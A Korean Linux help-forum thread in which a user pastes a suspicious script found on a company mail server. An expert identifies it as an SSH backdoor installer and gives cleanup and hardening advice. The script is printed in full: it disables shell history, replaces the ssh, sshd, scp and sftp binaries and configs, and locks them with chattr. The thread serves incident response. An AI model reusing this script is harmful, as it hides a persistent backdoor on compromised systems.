질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

해킹당한거같은데요..ㅜㅜ

작성자 정보

  • antihong 작성
  • 작성일

컨텐츠 정보

본문

안녕하십니까? 홍석범입니다.

스크립트 파일을 보시면 ssh 백도어라는 것을 쉽게 알 수 있습니다.
-. 원래의 실행파일은 /etc/rpm 으로 옮기고,
-. 설정파일 및 백도어 ssh 백도어 파일들로 변경한 후 삭제등이 불가하도록
속성을 변경한 것입니다.

이는 이미 root 권한까지 빼앗긴 것으로 보이므로, chkrootkit 등으로 백도어 파일들을 검색해 보시고  원본 파일로모두 교체하셔야 합니다.
아울러, iptables를 활용한 시스템의 접근통제를 엄격하게 설정하시고(특히 ssh),  커널버전이 낮을 경우 즉시 업그레이드하셔야 합니다.

감사합니다.

김도형 님의 글



ssh 공격이 들어온거같아서 백도어를 찾아볼려구하다가

#find / -type f -perm +6000 -ls 쳐보니 games란 파일있더군요.

처음보는거같애서 들어가보니 이런게 나오더군요...해킹당한건가용???

회사메일인데 다시 구축해야할까요? /tmp 에 ssh-Z??? 파일도 자꾸재생하구요.

#/usr/local/games/back

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
echo "++++ Starting.... ++++"
chattr -suia /usr/bin/ssh
chattr -suia /usr/bin/sftp
chattr -suia /usr/sbin/sshd
chattr -suia /usr/bin/scp
mkdir -p /etc/rpm
mv /usr/bin/ssh /etc/rpm
mv /usr/bin/sftp /etc/rpm
mv /usr/sbin/sshd /etc/rpm
mv /usr/bin/scp /etc/rpm
rm -rf /etc/ssh/sshd_config
rm -rf /etc/ssh/ssh_config
mv libcrypto.so.4 /lib/libcrypto.so.4
sleep 10
echo "[+] Installing SshD backdor..[+]"
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp
mv 1 /etc/ssh/sshd_config
mv 2 /etc/ssh/ssh_config
chattr +suia /usr/bin/ssh
chattr +suia /usr/bin/sftp
chattr +suia /usr/sbin/sshd
chattr +suia /usr/bin/scp

sleep 10

echo "Restart SshD deamon manualy "




 

관련자료

댓글 0
등록된 댓글이 없습니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,150 명
  • 현재 강좌수 :  36,433 개
  • 현재 접속자 :  252 명